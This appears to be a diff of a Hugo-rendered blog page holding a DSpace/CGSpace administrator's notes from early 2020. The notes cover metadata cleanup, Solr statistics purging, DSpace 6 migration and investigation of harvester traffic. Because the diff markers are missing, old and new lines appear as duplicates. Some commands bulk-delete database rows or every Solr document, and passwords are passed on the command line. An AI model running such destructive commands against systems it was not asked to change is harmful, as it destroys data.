<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.identifier.issn[en_US]&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-29-issn-distinct.csv WITH CSV HEADER;
COPY 2900
</code></pre><ul>
<li>I re-applied all my corrections, filtering out things like multi-value separators and values that are actually ISBNs so I can fix them later</li>
<li>Then I applied 181 fixes for ISSNs using <code>fix-metadata-values.py</code> on DSpace Test and CGSpace (after testing locally):</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-01-29-ISSNs-Distinct.csv -db dspace -u dspace -p 'fuuu' -f 'dc.identifier.issn[en_US]' -m 21 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-01-29-ISSNs-Distinct.csv -db dspace -u dspace -p &#39;fuuu&#39; -f &#39;dc.identifier.issn[en_US]&#39; -m 21 -t correct -d
</code></pre><h2 id="2020-01-30">2020-01-30</h2>
<ul>
<li>About to start working on the DSpace 6 port and I&rsquo;m looking at commits that are in the not-yet-tagged DSpace 6.4:
View File
@ -38,7 +38,7 @@ The code finally builds and runs with a fresh install
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -153,7 +153,7 @@ CREATE EXTENSION pgcrypto;
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace63=# DELETE FROM schema_version WHERE version IN ('5.0.2015.01.27', '5.6.2015.12.03.2', '5.6.2016.08.08', '5.0.2017.04.28', '5.0.2017.09.25', '5.8.2015.12.03.3');
<pre tabindex="0"><code>dspace63=# DELETE FROM schema_version WHERE version IN (&#39;5.0.2015.01.27&#39;, &#39;5.6.2015.12.03.2&#39;, &#39;5.6.2016.08.08&#39;, &#39;5.0.2017.04.28&#39;, &#39;5.0.2017.09.25&#39;, &#39;5.8.2015.12.03.3&#39;);
</code></pre><ul>
<li>Then I ran <code>dspace database migrate</code> and got an error:</li>
</ul>
@ -260,17 +260,17 @@ org.dspace.discovery.SearchServiceException: Invalid UUID string: 111210
<li>If I look in Solr&rsquo;s search core I do actually see items with integers for their resource ID, which I think are all supposed to be UUIDs now&hellip;</li>
<li>I dropped all the documents in the search core:</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'http://localhost:8080/solr/search/update?stream.body=&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&amp;commit=true'
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8080/solr/search/update?stream.body=&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&amp;commit=true&#39;
</code></pre><ul>
<li>Still didn&rsquo;t work, so I&rsquo;m going to try a clean database import and migration:</li>
</ul>
<pre tabindex="0"><code>$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspace63
$ psql -h localhost -U postgres -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspace63 -O --role=dspacetest -h localhost dspace_2020-01-27.backup
$ psql -h localhost -U postgres -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres -c &#39;alter user dspacetest nosuperuser;&#39;
$ psql -h localhost -U postgres dspace63
dspace63=# CREATE EXTENSION pgcrypto;
dspace63=# DELETE FROM schema_version WHERE version IN ('5.0.2015.01.27', '5.6.2015.12.03.2', '5.6.2016.08.08', '5.0.2017.04.28', '5.0.2017.09.25', '5.8.2015.12.03.3');
dspace63=# DELETE FROM schema_version WHERE version IN (&#39;5.0.2015.01.27&#39;, &#39;5.6.2015.12.03.2&#39;, &#39;5.6.2016.08.08&#39;, &#39;5.0.2017.04.28&#39;, &#39;5.0.2017.09.25&#39;, &#39;5.8.2015.12.03.3&#39;);
dspace63=# DROP VIEW eperson_metadata;
dspace63=# \q
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspace63
@ -365,22 +365,22 @@ $ podman run --name dspacedb10 -v dspacedb_data:/var/lib/postgresql/data -e POST
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspace63
$ psql -h localhost -U postgres -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2020-02-06.backup
$ pg_restore -h localhost -U postgres -d dspace63 -O --role=dspacetest -h localhost ~/Downloads/cgspace_2020-02-06.backup
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspace63
$ psql -h localhost -U postgres -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres -c &#39;alter user dspacetest nosuperuser;&#39;
$ psql -h localhost -U postgres dspace63
dspace63=# CREATE EXTENSION pgcrypto;
dspace63=# DELETE FROM schema_version WHERE version IN ('5.0.2015.01.27', '5.6.2015.12.03.2', '5.6.2016.08.08', '5.0.2017.04.28', '5.0.2017.09.25', '5.8.2015.12.03.3');
dspace63=# DELETE FROM schema_version WHERE version IN (&#39;5.0.2015.01.27&#39;, &#39;5.6.2015.12.03.2&#39;, &#39;5.6.2016.08.08&#39;, &#39;5.0.2017.04.28&#39;, &#39;5.0.2017.09.25&#39;, &#39;5.8.2015.12.03.3&#39;);
dspace63=# DROP VIEW eperson_metadata;
dspace63=# \q
</code></pre><ul>
<li>I purged ~33,000 hits from the &ldquo;Jersey/2.6&rdquo; bot in CGSpace&rsquo;s statistics using my <code>check-spider-hits.sh</code> script:</li>
</ul>
<pre tabindex="0"><code>$ ./check-spider-hits.sh -d -p -f /tmp/jersey -s statistics -u http://localhost:8081/solr
$ for year in 2018 2017 2016 2015; do ./check-spider-hits.sh -d -p -f /tmp/jersey -s &quot;statistics-${year}&quot; -u http://localhost:8081/solr; done
$ for year in 2018 2017 2016 2015; do ./check-spider-hits.sh -d -p -f /tmp/jersey -s &#34;statistics-${year}&#34; -u http://localhost:8081/solr; done
</code></pre><ul>
<li>I noticed another user agent in the logs that we should add to the list:</li>
</ul>
@ -389,23 +389,23 @@ $ for year in 2018 2017 2016 2015; do ./check-spider-hits.sh -d -p -f /tmp/jerse
<li>I made <a href="https://github.com/atmire/COUNTER-Robots/issues/31">an issue on the COUNTER-Robots repository</a></li>
<li>I found a <a href="https://github.com/freedev/solr-import-export-json">nice tool for exporting and importing Solr records</a> and it seems to work for exporting our 2019 stats from the large statistics core!</li>
</ul>
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2019-01.json -f 'dateYearMonth:2019-01' -k uid
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2019-01.json -f &#39;dateYearMonth:2019-01&#39; -k uid
$ ls -lh /tmp/statistics-2019-01.json
-rw-rw-r-- 1 aorth aorth 3.7G Feb 6 09:26 /tmp/statistics-2019-01.json
</code></pre><ul>
<li>Then I tested importing this by creating a new core in my development environment:</li>
</ul>
<pre tabindex="0"><code>$ curl 'http://localhost:8080/solr/admin/cores?action=CREATE&amp;name=statistics-2019&amp;instanceDir=/home/aorth/dspace/solr/statistics&amp;dataDir=/home/aorth/dspace/solr/statistics-2019/data'
<pre tabindex="0"><code>$ curl &#39;http://localhost:8080/solr/admin/cores?action=CREATE&amp;name=statistics-2019&amp;instanceDir=/home/aorth/dspace/solr/statistics&amp;dataDir=/home/aorth/dspace/solr/statistics-2019/data&#39;
$ ./run.sh -s http://localhost:8080/solr/statistics-2019 -a import -o ~/Downloads/statistics-2019-01.json -k uid
</code></pre><ul>
<li>This imports the records into the core, but DSpace can&rsquo;t see them, and when I restart Tomcat the core is not seen by Solr&hellip;</li>
<li>I got the core to load by adding it to <code>dspace/solr/solr.xml</code> manually, i.e.:</li>
</ul>
<pre tabindex="0"><code> &lt;cores adminPath=&quot;/admin/cores&quot;&gt;
<pre tabindex="0"><code> &lt;cores adminPath=&#34;/admin/cores&#34;&gt;
...
&lt;core name=&quot;statistics&quot; instanceDir=&quot;statistics&quot; /&gt;
&lt;core name=&quot;statistics-2019&quot; instanceDir=&quot;statistics&quot;&gt;
&lt;property name=&quot;dataDir&quot; value=&quot;/home/aorth/dspace/solr/statistics-2019/data&quot; /&gt;
&lt;core name=&#34;statistics&#34; instanceDir=&#34;statistics&#34; /&gt;
&lt;core name=&#34;statistics-2019&#34; instanceDir=&#34;statistics&#34;&gt;
&lt;property name=&#34;dataDir&#34; value=&#34;/home/aorth/dspace/solr/statistics-2019/data&#34; /&gt;
&lt;/core&gt;
...
&lt;/cores&gt;
@ -439,7 +439,7 @@ $ make
$ ./bin/create-links-in ~/.local/bin
$ export FLAMEGRAPH_DIR=/home/aorth/src/git/FlameGraph
$ export JAVA_HOME=/usr/lib/jvm/java-8-openjdk
$ export JAVA_OPTS=&quot;-XX:+PreserveFramePointer&quot;
$ export JAVA_OPTS=&#34;-XX:+PreserveFramePointer&#34;
$ ~/dspace63/bin/dspace index-discovery -b &amp;
# pid of tomcat java process
$ perf-java-flames 4478
@ -485,12 +485,12 @@ schedtool -D -e ~/dspace63/bin/dspace index-discovery -b 5112.96s user 127.80s
</ul>
<pre tabindex="0"><code>$ export JAVA_HOME=/usr/lib/jvm/java-8-openjdk
$ export PERF_RECORD_SECONDS=60
$ export JAVA_OPTS=&quot;-XX:+PreserveFramePointer&quot;
$ export JAVA_OPTS=&#34;-XX:+PreserveFramePointer&#34;
$ time schedtool -D -e ~/dspace/bin/dspace index-discovery -b &amp;
# process id of java indexing process (not Tomcat)
$ perf-java-record-stack 169639
$ sudo perf script -i /tmp/perf-169639.data &gt; out.dspace510-1
$ cat out.dspace510-1 | ../FlameGraph/stackcollapse-perf.pl | grep -E '^java' | ../FlameGraph/flamegraph.pl --color=java --hash &gt; out.dspace510-1.svg
$ cat out.dspace510-1 | ../FlameGraph/stackcollapse-perf.pl | grep -E &#39;^java&#39; | ../FlameGraph/flamegraph.pl --color=java --hash &gt; out.dspace510-1.svg
</code></pre><ul>
<li>All data recorded on my laptop with the same kernel, same boot, etc.</li>
<li>CGSpace 5.8 (with Atmire patches):</li>
@ -525,14 +525,14 @@ $ cat out.dspace510-1 | ../FlameGraph/stackcollapse-perf.pl | grep -E '^java' |
<ul>
<li>Maria from Bioversity asked me to add some ORCID iDs to our controlled vocabulary so I combined them with our existing ones and updated the names from the ORCID API:</li>
</ul>
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcid-ids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; /tmp/2020-02-11-combined-orcids.txt
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcid-ids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2020-02-11-combined-orcids.txt
$ ./resolve-orcids.py -i /tmp/2020-02-11-combined-orcids.txt -o /tmp/2020-02-11-combined-names.txt -d
# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
</code></pre><ul>
<li>Then I noticed some author names had changed, so I captured the old and new names in a CSV file and fixed them using <code>fix-metadata-values.py</code>:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-02-11-correct-orcid-ids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -t correct -m 240 -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-02-11-correct-orcid-ids.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.creator.id -t correct -m 240 -d
</code></pre><ul>
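<li>The CSV for <code>fix-metadata-values.py</code> has the old value in a column named after the metadata field and the new value in a column named <code>correct</code>; a sketch with hypothetical names:</li>
</ul>
<pre tabindex="0"><code>cg.creator.id,correct
"jane doe: 0000-0002-1825-0097","Jane Doe: 0000-0002-1825-0097"
</code></pre><ul>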
<li>On a hunch I decided to try to add these ORCID iDs to existing items that might not have them yet
<ul>
@ -541,22 +541,22 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;Staver, Charles&quot;,charles staver: 0000-0002-4532-6077
&quot;Staver, C.&quot;,charles staver: 0000-0002-4532-6077
&quot;Fungo, R.&quot;,Robert Fungo: 0000-0002-4264-6905
&quot;Remans, R.&quot;,Roseline Remans: 0000-0003-3659-8529
&quot;Remans, Roseline&quot;,Roseline Remans: 0000-0003-3659-8529
&quot;Rietveld A.&quot;,Anne Rietveld: 0000-0002-9400-9473
&quot;Rietveld, A.&quot;,Anne Rietveld: 0000-0002-9400-9473
&quot;Rietveld, A.M.&quot;,Anne Rietveld: 0000-0002-9400-9473
&quot;Rietveld, Anne M.&quot;,Anne Rietveld: 0000-0002-9400-9473
&quot;Fongar, A.&quot;,Andrea Fongar: 0000-0003-2084-1571
&quot;Müller, Anna&quot;,Anna Müller: 0000-0003-3120-8560
&quot;Müller, A.&quot;,Anna Müller: 0000-0003-3120-8560
&#34;Staver, Charles&#34;,charles staver: 0000-0002-4532-6077
&#34;Staver, C.&#34;,charles staver: 0000-0002-4532-6077
&#34;Fungo, R.&#34;,Robert Fungo: 0000-0002-4264-6905
&#34;Remans, R.&#34;,Roseline Remans: 0000-0003-3659-8529
&#34;Remans, Roseline&#34;,Roseline Remans: 0000-0003-3659-8529
&#34;Rietveld A.&#34;,Anne Rietveld: 0000-0002-9400-9473
&#34;Rietveld, A.&#34;,Anne Rietveld: 0000-0002-9400-9473
&#34;Rietveld, A.M.&#34;,Anne Rietveld: 0000-0002-9400-9473
&#34;Rietveld, Anne M.&#34;,Anne Rietveld: 0000-0002-9400-9473
&#34;Fongar, A.&#34;,Andrea Fongar: 0000-0003-2084-1571
&#34;Müller, Anna&#34;,Anna Müller: 0000-0003-3120-8560
&#34;Müller, A.&#34;,Anna Müller: 0000-0003-3120-8560
</code></pre><ul>
<li>Running the <code>add-orcid-identifiers-csv.py</code> script I added 144 ORCID iDs to items on CGSpace!</li>
</ul>
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i /tmp/2020-02-11-add-orcid-ids.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i /tmp/2020-02-11-add-orcid-ids.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Minor updates to all Python utility scripts in the CGSpace git repository</li>
<li>Update the spider agent patterns in CGSpace <code>5_x-prod</code> branch from the latest <a href="https://github.com/atmire/COUNTER-Robots">COUNTER-Robots</a> project
@ -575,7 +575,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
</li>
<li>Peter asked me to update John McIntire&rsquo;s name format on CGSpace so I ran the following PostgreSQL query:</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value='McIntire, John M.' WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value='McIntire, John';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=&#39;McIntire, John M.&#39; WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value=&#39;McIntire, John&#39;;
UPDATE 26
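dspace=# \q
$ # a sketch: after direct database edits like this we also reindex Discovery so the change shows up in search and browse
$ time chrt -i 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b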
</code></pre><h2 id="2020-02-17">2020-02-17</h2>
<ul>
@ -622,10 +622,10 @@ UPDATE 26
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics/select&quot; -d &quot;q=dns:/squeeze3.bronco.co.uk./&amp;rows=0&quot;
&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/select&#34; -d &#34;q=dns:/squeeze3.bronco.co.uk./&amp;rows=0&#34;
&lt;?xml version=&#34;1.0&#34; encoding=&#34;UTF-8&#34;?&gt;
&lt;response&gt;
&lt;lst name=&quot;responseHeader&quot;&gt;&lt;int name=&quot;status&quot;&gt;0&lt;/int&gt;&lt;int name=&quot;QTime&quot;&gt;4&lt;/int&gt;&lt;lst name=&quot;params&quot;&gt;&lt;str name=&quot;q&quot;&gt;dns:/squeeze3.bronco.co.uk./&lt;/str&gt;&lt;str name=&quot;rows&quot;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&quot;response&quot; numFound=&quot;86044&quot; start=&quot;0&quot;&gt;&lt;/result&gt;
&lt;lst name=&#34;responseHeader&#34;&gt;&lt;int name=&#34;status&#34;&gt;0&lt;/int&gt;&lt;int name=&#34;QTime&#34;&gt;4&lt;/int&gt;&lt;lst name=&#34;params&#34;&gt;&lt;str name=&#34;q&#34;&gt;dns:/squeeze3.bronco.co.uk./&lt;/str&gt;&lt;str name=&#34;rows&#34;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&#34;response&#34; numFound=&#34;86044&#34; start=&#34;0&#34;&gt;&lt;/result&gt;
&lt;/response&gt;
</code></pre><ul>
<li>The totals in each core are:
@ -641,8 +641,8 @@ UPDATE 26
</li>
<li>I will purge them from each core one by one, ie:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics-2015/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary &quot;&lt;delete&gt;&lt;query&gt;dns:squeeze3.bronco.co.uk.&lt;/query&gt;&lt;/delete&gt;&quot;
$ curl -s &quot;http://localhost:8081/solr/statistics-2014/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary &quot;&lt;delete&gt;&lt;query&gt;dns:squeeze3.bronco.co.uk.&lt;/query&gt;&lt;/delete&gt;&quot;
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2015/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;dns:squeeze3.bronco.co.uk.&lt;/query&gt;&lt;/delete&gt;&#34;
$ curl -s &#34;http://localhost:8081/solr/statistics-2014/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;dns:squeeze3.bronco.co.uk.&lt;/query&gt;&lt;/delete&gt;&#34;
</code></pre><ul>
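<li>Afterwards I can re-run the earlier select query against each core to verify the purge (numFound should drop to 0), e.g.:</li>
</ul>
<pre tabindex="0"><code>$ curl -s "http://localhost:8081/solr/statistics-2015/select" -d "q=dns:/squeeze3.bronco.co.uk./&amp;rows=0"
</code></pre><ul>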
<li>Deploy latest Tomcat and PostgreSQL JDBC driver changes on CGSpace (linode18)</li>
<li>Deploy latest <code>5_x-prod</code> branch on CGSpace (linode18)</li>
@ -654,13 +654,13 @@ $ curl -s &quot;http://localhost:8081/solr/statistics-2014/update?softCommit=tru
</li>
<li>I ran the <code>dspace cleanup -v</code> process on CGSpace and got an error:</li>
</ul>
<pre tabindex="0"><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(183996) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(183996) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre tabindex="0"><code># su - postgres
$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (183996);'
$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (183996);&#39;
UPDATE 1
</code></pre><ul>
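<li>After that the cleanup process can be re-run:</li>
</ul>
<pre tabindex="0"><code>$ dspace cleanup -v
</code></pre><ul>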
<li>Add one more new Bioversity ORCID iD to the controlled vocabulary on CGSpace</li>
@ -671,7 +671,7 @@ UPDATE 1
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ dspace user -a -m wow@me.com -g Felix -s Shaw -p 'fuananaaa'
<pre tabindex="0"><code>$ dspace user -a -m wow@me.com -g Felix -s Shaw -p &#39;fuananaaa&#39;
</code></pre><ul>
<li>For some reason the Atmire Content and Usage Analysis (CUA) module&rsquo;s Usage Statistics is drawing blank graphs
<ul>
@ -708,7 +708,7 @@ org.springframework.web.util.NestedServletException: Handler processing failed;
</ul>
</li>
</ul>
<pre tabindex="0"><code># grep -c 'initialize class org.jfree.chart.JFreeChart' dspace.log.2020-0*
<pre tabindex="0"><code># grep -c &#39;initialize class org.jfree.chart.JFreeChart&#39; dspace.log.2020-0*
dspace.log.2020-01-12:4
dspace.log.2020-01-13:66
dspace.log.2020-01-14:4
@ -724,25 +724,25 @@ dspace.log.2020-01-21:4
<li>I deployed the fix on CGSpace (linode18) and I was able to see the graphs in the Atmire CUA Usage Statistics&hellip;</li>
<li>On an unrelated note, something weird is going on: I see millions of hits from IP 34.218.226.147 in Solr statistics, but if I remember correctly that IP belongs to CodeObia&rsquo;s AReS explorer, which should only be using REST and therefore should not generate any Solr statistics&hellip;?</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics-2018/select&quot; -d &quot;q=ip:34.218.226.147&amp;rows=0&quot;
&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2018/select&#34; -d &#34;q=ip:34.218.226.147&amp;rows=0&#34;
&lt;?xml version=&#34;1.0&#34; encoding=&#34;UTF-8&#34;?&gt;
&lt;response&gt;
&lt;lst name=&quot;responseHeader&quot;&gt;&lt;int name=&quot;status&quot;&gt;0&lt;/int&gt;&lt;int name=&quot;QTime&quot;&gt;811&lt;/int&gt;&lt;lst name=&quot;params&quot;&gt;&lt;str name=&quot;q&quot;&gt;ip:34.218.226.147&lt;/str&gt;&lt;str name=&quot;rows&quot;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&quot;response&quot; numFound=&quot;5536097&quot; start=&quot;0&quot;&gt;&lt;/result&gt;
&lt;lst name=&#34;responseHeader&#34;&gt;&lt;int name=&#34;status&#34;&gt;0&lt;/int&gt;&lt;int name=&#34;QTime&#34;&gt;811&lt;/int&gt;&lt;lst name=&#34;params&#34;&gt;&lt;str name=&#34;q&#34;&gt;ip:34.218.226.147&lt;/str&gt;&lt;str name=&#34;rows&#34;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&#34;response&#34; numFound=&#34;5536097&#34; start=&#34;0&#34;&gt;&lt;/result&gt;
&lt;/response&gt;
</code></pre><ul>
<li>And there are apparently two million from last month (2020-01):</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics/select&quot; -d &quot;q=ip:34.218.226.147&amp;fq=dateYearMonth:2020-01&amp;rows=0&quot;
&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/select&#34; -d &#34;q=ip:34.218.226.147&amp;fq=dateYearMonth:2020-01&amp;rows=0&#34;
&lt;?xml version=&#34;1.0&#34; encoding=&#34;UTF-8&#34;?&gt;
&lt;response&gt;
&lt;lst name=&quot;responseHeader&quot;&gt;&lt;int name=&quot;status&quot;&gt;0&lt;/int&gt;&lt;int name=&quot;QTime&quot;&gt;248&lt;/int&gt;&lt;lst name=&quot;params&quot;&gt;&lt;str name=&quot;q&quot;&gt;ip:34.218.226.147&lt;/str&gt;&lt;str name=&quot;fq&quot;&gt;dateYearMonth:2020-01&lt;/str&gt;&lt;str name=&quot;rows&quot;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&quot;response&quot; numFound=&quot;2173455&quot; start=&quot;0&quot;&gt;&lt;/result&gt;
&lt;lst name=&#34;responseHeader&#34;&gt;&lt;int name=&#34;status&#34;&gt;0&lt;/int&gt;&lt;int name=&#34;QTime&#34;&gt;248&lt;/int&gt;&lt;lst name=&#34;params&#34;&gt;&lt;str name=&#34;q&#34;&gt;ip:34.218.226.147&lt;/str&gt;&lt;str name=&#34;fq&#34;&gt;dateYearMonth:2020-01&lt;/str&gt;&lt;str name=&#34;rows&#34;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&#34;response&#34; numFound=&#34;2173455&#34; start=&#34;0&#34;&gt;&lt;/result&gt;
&lt;/response&gt;
</code></pre><ul>
<li>But when I look at the nginx access logs for the past month or so I only see 84,000, all of which are on <code>/rest</code> and none of which are to XMLUI:</li>
</ul>
<pre tabindex="0"><code># zcat /var/log/nginx/*.log.*.gz | grep -c 34.218.226.147
84322
# zcat /var/log/nginx/*.log.*.gz | grep 34.218.226.147 | grep -c '/rest'
# zcat /var/log/nginx/*.log.*.gz | grep 34.218.226.147 | grep -c &#39;/rest&#39;
84322
</code></pre><ul>
<li>Either the requests didn&rsquo;t get logged, or there is some mixup with the Solr documents (fuck!)
@ -758,13 +758,13 @@ dspace.log.2020-01-21:4
</li>
<li>Anyways, I faceted by IP in 2020-01 and see:</li>
</ul>
<pre tabindex="0"><code>$ curl -s 'http://localhost:8081/solr/statistics/select?q=*:*&amp;fq=dateYearMonth:2020-01&amp;rows=0&amp;wt=json&amp;indent=true&amp;facet=true&amp;facet.field=ip'
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select?q=*:*&amp;fq=dateYearMonth:2020-01&amp;rows=0&amp;wt=json&amp;indent=true&amp;facet=true&amp;facet.field=ip&#39;
...
&quot;172.104.229.92&quot;,2686876,
&quot;34.218.226.147&quot;,2173455,
&quot;163.172.70.248&quot;,80945,
&quot;163.172.71.24&quot;,55211,
&quot;163.172.68.99&quot;,38427,
&#34;172.104.229.92&#34;,2686876,
&#34;34.218.226.147&#34;,2173455,
&#34;163.172.70.248&#34;,80945,
&#34;163.172.71.24&#34;,55211,
&#34;163.172.68.99&#34;,38427,
</code></pre><ul>
<li>Surprise surprise, the top two IPs are from AReS servers&hellip; wtf.</li>
<li>The next three are from Online in France and they are all using this weird user agent and making tens of thousands of requests to Discovery:</li>
@ -775,14 +775,14 @@ dspace.log.2020-01-21:4
<li>I need to see why AReS harvesting is inflating the stats, as it should only be making REST requests&hellip;</li>
<li>Shiiiiit, I see 84,000 requests from the AReS IP today alone:</li>
</ul>
<pre tabindex="0"><code>$ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-22*+AND+ip:172.104.229.92&amp;rows=0&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select?q=time:2020-02-22*+AND+ip:172.104.229.92&amp;rows=0&amp;wt=json&amp;indent=true&#39;
...
&quot;response&quot;:{&quot;numFound&quot;:84594,&quot;start&quot;:0,&quot;docs&quot;:[]
&#34;response&#34;:{&#34;numFound&#34;:84594,&#34;start&#34;:0,&#34;docs&#34;:[]
</code></pre><ul>
<li>Fuck! And of course the ILRI websites doing their daily REST harvesting are causing issues too, from today alone:</li>
</ul>
<pre tabindex="0"><code> &quot;2a01:7e00::f03c:91ff:fe9a:3a37&quot;,35512,
&quot;2a01:7e00::f03c:91ff:fe18:7396&quot;,26155,
<pre tabindex="0"><code> &#34;2a01:7e00::f03c:91ff:fe9a:3a37&#34;,35512,
&#34;2a01:7e00::f03c:91ff:fe18:7396&#34;,26155,
</code></pre><ul>
<li>I need to try to make some requests for these URLs and observe if they make a statistics hit:
<ul>
@ -793,12 +793,12 @@ dspace.log.2020-01-21:4
<li>Those are the requests AReS and ILRI servers are making&hellip; nearly 150,000 per day!</li>
<li>Well that settles it!</li>
</ul>
<pre tabindex="0"><code>$ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+statistics_type:view&amp;fq=ip:78.128.99.24&amp;rows=10&amp;wt=json&amp;indent=true' | grep numFound
&quot;response&quot;:{&quot;numFound&quot;:12,&quot;start&quot;:0,&quot;docs&quot;:[
$ curl -s 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=50&amp;offset=82450'
$ curl -s 'http://localhost:8081/solr/statistics/update?softCommit=true'
$ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+statistics_type:view&amp;fq=ip:78.128.99.24&amp;rows=10&amp;wt=json&amp;indent=true' | grep numFound
&quot;response&quot;:{&quot;numFound&quot;:62,&quot;start&quot;:0,&quot;docs&quot;:[
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+statistics_type:view&amp;fq=ip:78.128.99.24&amp;rows=10&amp;wt=json&amp;indent=true&#39; | grep numFound
